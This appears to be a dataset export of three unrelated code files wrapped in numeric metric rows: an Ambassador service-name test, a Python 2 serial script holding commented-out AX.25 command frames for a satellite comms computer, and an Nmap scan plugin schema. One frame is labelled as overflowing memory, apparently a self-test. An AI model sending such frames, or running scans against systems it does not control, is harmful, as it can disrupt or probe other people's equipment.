| 0.339863
| 31,089
| 708
| 123
| 43.911017
| 0.710228
| 0.199331
| 0
| 0.716338
| 0
| 0.021544
| 0.114148
| 0.007502
| 0
| 0
| 0
| 0.001412
| 0
| 1
| 0.023339
| false
| 0
| 0.010772
| 0.008977
| 0.044883
| 0.109515
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37c9c2e2e3a1a12a6f156c740b9fb2fb400552d9
| 9,165
|
py
|
Python
|
python/tests/test_qualify_service.py
|
imranismail/ambassador
|
0468c4f1daf2aeb254a5af3217d2d7f3ebf4cb90
|
[
"Apache-2.0"
] | null | null | null |
python/tests/test_qualify_service.py
|
imranismail/ambassador
|
0468c4f1daf2aeb254a5af3217d2d7f3ebf4cb90
|
[
"Apache-2.0"
] | null | null | null |
python/tests/test_qualify_service.py
|
imranismail/ambassador
|
0468c4f1daf2aeb254a5af3217d2d7f3ebf4cb90
|
[
"Apache-2.0"
] | null | null | null |
from typing import Optional
import logging
import sys
import pytest
# Configure root logging once at import time so test output is timestamped
# and levelled consistently with the rest of the ambassador test suite.
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s test %(levelname)s: %(message)s",
    datefmt='%Y-%m-%d %H:%M:%S'
)
# Shared logger handed to the ResourceFetcher/IR machinery below.
logger = logging.getLogger("ambassador")
from ambassador import Config, IR
from ambassador.fetch import ResourceFetcher
from ambassador.utils import NullSecretHandler
from ambassador.ir import IRResource
from ambassador.ir.irbasemapping import qualify_service_name
# Minimal Ambassador Module manifest: just enough configuration to build a
# working IR for the qualify_service_name tests.
# NOTE: the variable name 'yaml' shadows the PyYAML module name; it is only
# a string constant here (PyYAML is not imported in this file).
yaml = '''
---
apiVersion: getambassador.io/v1
kind: Module
name: ambassador
config: {}
'''
def test_qualify_service():
    """Exercise qualify_service_name() across schemes, ports and namespaces.

    The rules under test:
      * a bare service name gains ".<namespace>" only for a non-default
        namespace,
      * a name that already carries a namespace (or is "localhost") is
        always passed through unchanged,
      * any scheme prefix and port suffix are preserved, and
      * a malformed port section is left alone but reported via aconf errors.
    """
    aconf = Config()

    fetcher = ResourceFetcher(logger, aconf)
    fetcher.parse_yaml(yaml)

    aconf.load_all(fetcher.sorted())

    secret_handler = NullSecretHandler(logger, None, None, "0")
    ir = IR(aconf, file_checker=lambda path: True, secret_handler=secret_handler)

    assert ir, "could not create an IR"

    # Every combination of scheme and (scheme-appropriate) port behaves the
    # same way, so drive the assertions from a table instead of spelling
    # each case out long-hand.
    scheme_port_pairs = (
        ("", ""), ("", ":80"),
        ("http://", ""), ("http://", ":80"),
        ("https://", ""), ("https://", ":443"),
    )

    for scheme, port in scheme_port_pairs:
        plain = scheme + "backoffice" + port
        qualified = scheme + "backoffice.otherns" + port

        # An unqualified name picks up a non-default namespace...
        assert qualify_service_name(ir, plain, None) == plain
        assert qualify_service_name(ir, plain, "default") == plain
        assert qualify_service_name(ir, plain, "otherns") == qualified

        # ...while an already-qualified name is never re-qualified.
        assert qualify_service_name(ir, qualified, None) == qualified
        assert qualify_service_name(ir, qualified, "default") == qualified
        assert qualify_service_name(ir, qualified, "otherns") == qualified

        # "localhost" is special-cased: it is never namespaced. It's not
        # meaningful to actually say "localhost.otherns", but it should be
        # passed through unchanged.
        local = scheme + "localhost" + port
        local_ns = scheme + "localhost.otherns" + port

        for namespace in (None, "default", "otherns"):
            assert qualify_service_name(ir, local, namespace) == local
            assert qualify_service_name(ir, local_ns, namespace) == local_ns

    # A malformed port section is passed through untouched, but logged as an
    # aconf error (prefixed with the resource key when one is supplied).
    assert qualify_service_name(ir, "https://bad-service:443:443", "otherns") == "https://bad-service:443:443"
    assert qualify_service_name(ir, "https://bad-service:443:443", "otherns",
                                rkey="test-rkey") == "https://bad-service:443:443"

    errors = ir.aconf.errors

    assert "-global-" in errors
    errors = errors["-global-"]

    assert len(errors) == 2

    assert not errors[0]["ok"]
    assert errors[0]["error"] == "Malformed service port in https://bad-service:443:443"

    assert not errors[1]["ok"]
    assert errors[1]["error"] == "test-rkey: Malformed service port in https://bad-service:443:443"
# Allow running this file directly (outside a normal pytest invocation);
# sys.argv is forwarded so pytest command-line flags still work.
if __name__ == '__main__':
    pytest.main(sys.argv)
| 59.129032
| 128
| 0.714675
| 1,124
| 9,165
| 5.679715
| 0.085409
| 0.166667
| 0.211466
| 0.278195
| 0.809994
| 0.806704
| 0.795896
| 0.763001
| 0.749373
| 0.572682
| 0
| 0.026137
| 0.119149
| 9,165
| 154
| 129
| 59.512987
| 0.764648
| 0.063393
| 0
| 0
| 0
| 0
| 0.436633
| 0.017139
| 0
| 0
| 0
| 0
| 0.710526
| 1
| 0.008772
| false
| 0
| 0.078947
| 0
| 0.087719
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
807178bb7026602f6624f84f7ba97bc0e7407339
| 5,817
|
py
|
Python
|
comms_computer/utils/ax25_test.py
|
peguerosdc/odiseo-fsw
|
17b14332b2e35b3ea0bb9c3e84b8c3b949f67591
|
[
"MIT"
] | null | null | null |
comms_computer/utils/ax25_test.py
|
peguerosdc/odiseo-fsw
|
17b14332b2e35b3ea0bb9c3e84b8c3b949f67591
|
[
"MIT"
] | null | null | null |
comms_computer/utils/ax25_test.py
|
peguerosdc/odiseo-fsw
|
17b14332b2e35b3ea0bb9c3e84b8c3b949f67591
|
[
"MIT"
] | 1
|
2021-05-20T06:59:06.000Z
|
2021-05-20T06:59:06.000Z
|
# Python 2 smoke-test script: pushes a pre-built AX.25 test frame to the
# flight software over a serial link and echoes everything that comes back.
# The commented-out ser.write() calls below are captured frame payloads for
# the various commands; uncomment exactly one to send it.
# NOTE(review): payloads are presumably already frame-escaped and CRC'd --
# confirm against the AX.25 encoder before reuse.
import serial

# Open the radio link (COM3 @ 9600 baud, pySerial defaults: 8N1, blocking reads).
ser = serial.Serial('COM3', 9600)
print "Sending test frame..."
# FRAME TO REQUEST SendTelemetry
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x1c\xf0\xf5\xcb\xce\x8b\xf6\x48\xa7\x21\x83\xe7\x19\x40\x4c\x1d\x7e\x7e")
# FRAME TO WRITE IN MEMORY
#ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\xe6\x67\x7d\xc5\x97\x7d\xca\xcb\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\xc1\xd8\xe3\xd8\x98\x5a\xf4\x4f\x64\x7f\x4c\x1d\x7e\x7e")
# FRAME TO OVERFLOW MEMORY
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\xe6\x67\x7d\xc5\x97\x7d\xca\xcb\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\xc1\xd8\xec\x84\x24\x48\x26\xce\x05\xb0\x4c\x1d\x7e\x7e")
# FRAME TO REQUEST MEMORY
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x13\xa3\xef\x07\x4d\x18\x3e\x84\x50\x96\xf9\x60\xca\xb0\x4c\x1d\x7e\x7e")
# FRAME TO REQUEST LOGS
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x13\x59\x8d\xb1\x49\xa2\x91\xc0\x53\x1a\x39\xb2\x30\x5c\xbc\x1d\x7e\x7e")
# FRAME TO CLEAR LOGS
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\xe6\x92\xb6\xf1\x8b\x03\x79\x0b\x13\x2d\xa6\xa5\x26\x40\x4c\x1d\x7e\x7e")
# FRAME TO CLEAN MEMORY
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\xe6\x9d\xea\x42\xc5\x62\x43\xc0\x28\x6d\x9e\x9c\xef\xf2\x73\x1d\x7e\x7e")
# FRAME TO CHANGE BEACON FREQUENCY to 250 ms
# WARNING
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x1c\x05\x3e\xf0\x7b\x8d\x3f\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf5\xcb\xce\x8b\xf9\x14\xee\x02\xf2\x08\x6a\x29\x13\xac\xbc\x1d\x7e\x7e")
# FRAME TO CHANGE BEACON FREQUENCY to 2^32 ms
#ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x1c\x05\x3e\xf0\x8e\x46\xfe\x2d\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\x27\xb0\xcd\x07\x39\xc6\xee\x83\x1d\x7e\x7e")
print "SENT"
# Wait for confirmation: read a fixed 90-byte reply and dump it as hex.
print "Waiting for confirmation..."
response = ser.read(90)
print ' '.join(x.encode('hex') for x in response)
print "CONFIRMED"
# Then dump any further traffic byte-by-byte as hex until interrupted
# (the trailing comma keeps the py2 print on one line).
while True:
    b = ser.read()
    print b.encode("hex") ,
# NOTE(review): unreachable -- the loop above never exits normally, so the
# port is only released when the process dies.
ser.close()
# python ccs_workspace\odiseo-hemisferioDerecho\utils\ax25_test.py
| 116.34
| 759
| 0.741276
| 1,370
| 5,817
| 3.145985
| 0.132847
| 0.112761
| 0.169142
| 0.175406
| 0.844548
| 0.844548
| 0.835035
| 0.824826
| 0.805104
| 0.787007
| 0
| 0.257434
| 0.023036
| 5,817
| 49
| 760
| 118.714286
| 0.500968
| 0.941035
| 0
| 0
| 0
| 0
| 0.224299
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.083333
| null | null | 0.5
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
80b7501a1f89d01b15591d96bfe1ee0d1f870f27
| 19,078
|
py
|
Python
|
nmap/komand_nmap/actions/scan/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
nmap/komand_nmap/actions/scan/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
nmap/komand_nmap/actions/scan/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
# GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Input:
    """Symbolic names for the Scan action's input fields (generated)."""
    ARGUMENTS = "arguments"  # extra nmap command-line arguments
    HOSTS = "hosts"          # target host(s), nmap-allowed formats
    PORTS = "ports"          # target port(s), nmap-allowed formats
    SUDO = "sudo"            # whether to run the scan with superuser privileges
class Output:
    """Symbolic names for the Scan action's output fields (generated)."""
    RESULT = "result"  # list of per-host scan result objects
class ScanInput(komand.Input):
    """JSON-schema-validated input for the Scan action.

    The schema is embedded verbatim as generated by the Komand SDK;
    "hosts" and "sudo" are the only required properties.
    """

    schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"arguments": {
"type": "string",
"title": "Arguments",
"description": "Arguments to supply to the Nmap command",
"order": 3
},
"hosts": {
"type": "string",
"title": "Hosts",
"description": "Host(s) to scan in Nmap-allowed formats",
"order": 1
},
"ports": {
"type": "string",
"title": "Ports",
"description": "Port(s) to scan in Nmap-allowed formats",
"order": 2
},
"sudo": {
"type": "boolean",
"title": "Sudo",
"description": "Whether or not to use superuser privileges for scan, e.g. -sS requires superuser privileges but -sT does not",
"default": false,
"order": 4
}
},
"required": [
"hosts",
"sudo"
]
}
""")

    def __init__(self):
        # Name the class explicitly rather than using self.__class__:
        # super(self.__class__, ...) recurses forever if this class is
        # ever subclassed, because self.__class__ is then the subclass.
        super(ScanInput, self).__init__(self.schema)
class ScanOutput(komand.Output):
    """JSON-schema-validated output for the Scan action.

    The schema is embedded verbatim as generated by the Komand SDK;
    "result" is an array of per-host scan records (addresses, hostnames,
    OS matches, status, TCP/UDP port details, vendor info).
    """

    schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"result": {
"type": "array",
"title": "Output Results",
"description": "Scan results",
"items": {
"$ref": "#/definitions/host"
},
"order": 1
}
},
"definitions": {
"addresses": {
"type": "object",
"title": "addresses",
"properties": {
"ipv4": {
"type": "string",
"title": "IPv4",
"description": "IPv4 Address",
"order": 1
},
"ipv6": {
"type": "string",
"title": "IPv6",
"description": "IPv6 Address",
"order": 2
}
}
},
"host": {
"type": "object",
"title": "host",
"properties": {
"addresses": {
"$ref": "#/definitions/addresses",
"title": "Addresses",
"description": "Addresses",
"order": 1
},
"hostnames": {
"type": "array",
"title": "Hostnames",
"description": "Hostnames",
"items": {
"$ref": "#/definitions/hostname"
},
"order": 2
},
"osmatch": {
"type": "array",
"title": "OS Matches",
"description": "OS matches",
"items": {
"$ref": "#/definitions/osmatch"
},
"order": 3
},
"status": {
"$ref": "#/definitions/status",
"title": "Status",
"description": "Status of the host",
"order": 4
},
"tcp": {
"type": "array",
"title": "TCP",
"description": "TCP ports",
"items": {
"$ref": "#/definitions/tcp"
},
"order": 5
},
"udp": {
"type": "array",
"title": "UDP",
"description": "UDP ports",
"items": {
"$ref": "#/definitions/udp"
},
"order": 6
},
"vendor": {
"type": "object",
"title": "Vendor",
"description": "Vendor",
"order": 7
}
},
"definitions": {
"addresses": {
"type": "object",
"title": "addresses",
"properties": {
"ipv4": {
"type": "string",
"title": "IPv4",
"description": "IPv4 Address",
"order": 1
},
"ipv6": {
"type": "string",
"title": "IPv6",
"description": "IPv6 Address",
"order": 2
}
}
},
"hostname": {
"type": "object",
"title": "hostname",
"properties": {
"name": {
"type": "string",
"title": "Hostname",
"description": "Hostname",
"order": 1
},
"type": {
"type": "string",
"title": "Type",
"description": "Type, eg. PTR",
"order": 2
}
}
},
"osclass": {
"type": "object",
"title": "osclass",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"cpe": {
"type": "array",
"title": "CPEs",
"description": "Common Platform Enumeration addresses",
"items": {
"type": "string"
},
"order": 2
},
"osfamily": {
"type": "string",
"title": "OS Family, eg. embedded",
"description": "OS family",
"order": 3
},
"osgen": {
"type": "string",
"title": "OS Generation",
"description": "OS Generation, eg. 10.7.x (for MacOS)",
"order": 4
},
"type": {
"type": "string",
"title": "Type",
"description": "Type of OS",
"order": 5
},
"vendor": {
"type": "string",
"title": "Vendor",
"description": "Vendor",
"order": 6
}
}
},
"osmatch": {
"type": "object",
"title": "osmatch",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"line": {
"type": "string",
"title": "Line",
"description": "Line",
"order": 2
},
"name": {
"type": "string",
"title": "Name",
"description": "Name",
"order": 3
},
"osclass": {
"type": "array",
"title": "OS Class",
"description": "OS class",
"items": {
"$ref": "#/definitions/osclass"
},
"order": 4
}
},
"definitions": {
"osclass": {
"type": "object",
"title": "osclass",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"cpe": {
"type": "array",
"title": "CPEs",
"description": "Common Platform Enumeration addresses",
"items": {
"type": "string"
},
"order": 2
},
"osfamily": {
"type": "string",
"title": "OS Family, eg. embedded",
"description": "OS family",
"order": 3
},
"osgen": {
"type": "string",
"title": "OS Generation",
"description": "OS Generation, eg. 10.7.x (for MacOS)",
"order": 4
},
"type": {
"type": "string",
"title": "Type",
"description": "Type of OS",
"order": 5
},
"vendor": {
"type": "string",
"title": "Vendor",
"description": "Vendor",
"order": 6
}
}
}
}
},
"status": {
"type": "object",
"title": "status",
"properties": {
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 1
},
"state": {
"type": "string",
"title": "State",
"description": "State eg. up",
"order": 2
}
}
},
"tcp": {
"type": "object",
"title": "tcp",
"properties": {
"conf": {
"type": "string",
"title": "Configuration",
"description": "Conf",
"order": 1
},
"cpe": {
"type": "string",
"title": "CPE",
"description": "Common Platform Enumeration address",
"order": 2
},
"extrainfo": {
"type": "string",
"title": "Extra Info",
"description": "Extra info",
"order": 3
},
"name": {
"type": "string",
"title": "Name",
"description": "Port name",
"order": 4
},
"port": {
"type": "integer",
"title": "Port",
"description": "Port number",
"order": 5
},
"product": {
"type": "string",
"title": "Product",
"description": "Product",
"order": 6
},
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 7
},
"state": {
"type": "string",
"title": "State",
"description": "State of port, eg. open",
"order": 8
},
"version": {
"type": "string",
"title": "Version",
"description": "Version",
"order": 9
}
}
},
"udp": {
"type": "object",
"title": "udp",
"properties": {
"conf": {
"type": "string",
"title": "Configuration",
"description": "Conf",
"order": 1
},
"cpe": {
"type": "string",
"title": "CPE",
"description": "Common Platform Enumeration address",
"order": 2
},
"extrainfo": {
"type": "string",
"title": "Extra Info",
"description": "Extra info",
"order": 3
},
"name": {
"type": "string",
"title": "Name",
"description": "Port name",
"order": 4
},
"port": {
"type": "integer",
"title": "Port",
"description": "Port number",
"order": 5
},
"product": {
"type": "string",
"title": "Product",
"description": "Product",
"order": 6
},
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 7
},
"state": {
"type": "string",
"title": "State",
"description": "State of port, eg. open",
"order": 8
},
"version": {
"type": "string",
"title": "Version",
"description": "Version",
"order": 9
}
}
}
}
},
"hostname": {
"type": "object",
"title": "hostname",
"properties": {
"name": {
"type": "string",
"title": "Hostname",
"description": "Hostname",
"order": 1
},
"type": {
"type": "string",
"title": "Type",
"description": "Type, eg. PTR",
"order": 2
}
}
},
"osclass": {
"type": "object",
"title": "osclass",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"cpe": {
"type": "array",
"title": "CPEs",
"description": "Common Platform Enumeration addresses",
"items": {
"type": "string"
},
"order": 2
},
"osfamily": {
"type": "string",
"title": "OS Family, eg. embedded",
"description": "OS family",
"order": 3
},
"osgen": {
"type": "string",
"title": "OS Generation",
"description": "OS Generation, eg. 10.7.x (for MacOS)",
"order": 4
},
"type": {
"type": "string",
"title": "Type",
"description": "Type of OS",
"order": 5
},
"vendor": {
"type": "string",
"title": "Vendor",
"description": "Vendor",
"order": 6
}
}
},
"osmatch": {
"type": "object",
"title": "osmatch",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"line": {
"type": "string",
"title": "Line",
"description": "Line",
"order": 2
},
"name": {
"type": "string",
"title": "Name",
"description": "Name",
"order": 3
},
"osclass": {
"type": "array",
"title": "OS Class",
"description": "OS class",
"items": {
"$ref": "#/definitions/osclass"
},
"order": 4
}
},
"definitions": {
"osclass": {
"type": "object",
"title": "osclass",
"properties": {
"accuracy": {
"type": "string",
"title": "Accuracy",
"description": "Accuracy of the match",
"order": 1
},
"cpe": {
"type": "array",
"title": "CPEs",
"description": "Common Platform Enumeration addresses",
"items": {
"type": "string"
},
"order": 2
},
"osfamily": {
"type": "string",
"title": "OS Family, eg. embedded",
"description": "OS family",
"order": 3
},
"osgen": {
"type": "string",
"title": "OS Generation",
"description": "OS Generation, eg. 10.7.x (for MacOS)",
"order": 4
},
"type": {
"type": "string",
"title": "Type",
"description": "Type of OS",
"order": 5
},
"vendor": {
"type": "string",
"title": "Vendor",
"description": "Vendor",
"order": 6
}
}
}
}
},
"status": {
"type": "object",
"title": "status",
"properties": {
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 1
},
"state": {
"type": "string",
"title": "State",
"description": "State eg. up",
"order": 2
}
}
},
"tcp": {
"type": "object",
"title": "tcp",
"properties": {
"conf": {
"type": "string",
"title": "Configuration",
"description": "Conf",
"order": 1
},
"cpe": {
"type": "string",
"title": "CPE",
"description": "Common Platform Enumeration address",
"order": 2
},
"extrainfo": {
"type": "string",
"title": "Extra Info",
"description": "Extra info",
"order": 3
},
"name": {
"type": "string",
"title": "Name",
"description": "Port name",
"order": 4
},
"port": {
"type": "integer",
"title": "Port",
"description": "Port number",
"order": 5
},
"product": {
"type": "string",
"title": "Product",
"description": "Product",
"order": 6
},
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 7
},
"state": {
"type": "string",
"title": "State",
"description": "State of port, eg. open",
"order": 8
},
"version": {
"type": "string",
"title": "Version",
"description": "Version",
"order": 9
}
}
},
"udp": {
"type": "object",
"title": "udp",
"properties": {
"conf": {
"type": "string",
"title": "Configuration",
"description": "Conf",
"order": 1
},
"cpe": {
"type": "string",
"title": "CPE",
"description": "Common Platform Enumeration address",
"order": 2
},
"extrainfo": {
"type": "string",
"title": "Extra Info",
"description": "Extra info",
"order": 3
},
"name": {
"type": "string",
"title": "Name",
"description": "Port name",
"order": 4
},
"port": {
"type": "integer",
"title": "Port",
"description": "Port number",
"order": 5
},
"product": {
"type": "string",
"title": "Product",
"description": "Product",
"order": 6
},
"reason": {
"type": "string",
"title": "Reason",
"description": "Reason, eg. syn-ack",
"order": 7
},
"state": {
"type": "string",
"title": "State",
"description": "State of port, eg. open",
"order": 8
},
"version": {
"type": "string",
"title": "Version",
"description": "Version",
"order": 9
}
}
}
}
}
""")

    def __init__(self):
        # Name the class explicitly rather than using self.__class__:
        # super(self.__class__, ...) recurses forever if this class is
        # ever subclassed, because self.__class__ is then the subclass.
        super(ScanOutput, self).__init__(self.schema)
| 25.676985
| 132
| 0.35119
| 1,261
| 19,078
| 5.294211
| 0.099128
| 0.115339
| 0.16402
| 0.022768
| 0.838376
| 0.833433
| 0.833433
| 0.833433
| 0.809167
| 0.809167
| 0
| 0.011682
| 0.479505
| 19,078
| 742
| 133
| 25.71159
| 0.660624
| 0.001939
| 0
| 0.725034
| 1
| 0.001368
| 0.976732
| 0.007458
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002736
| false
| 0
| 0.002736
| 0
| 0.02052
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
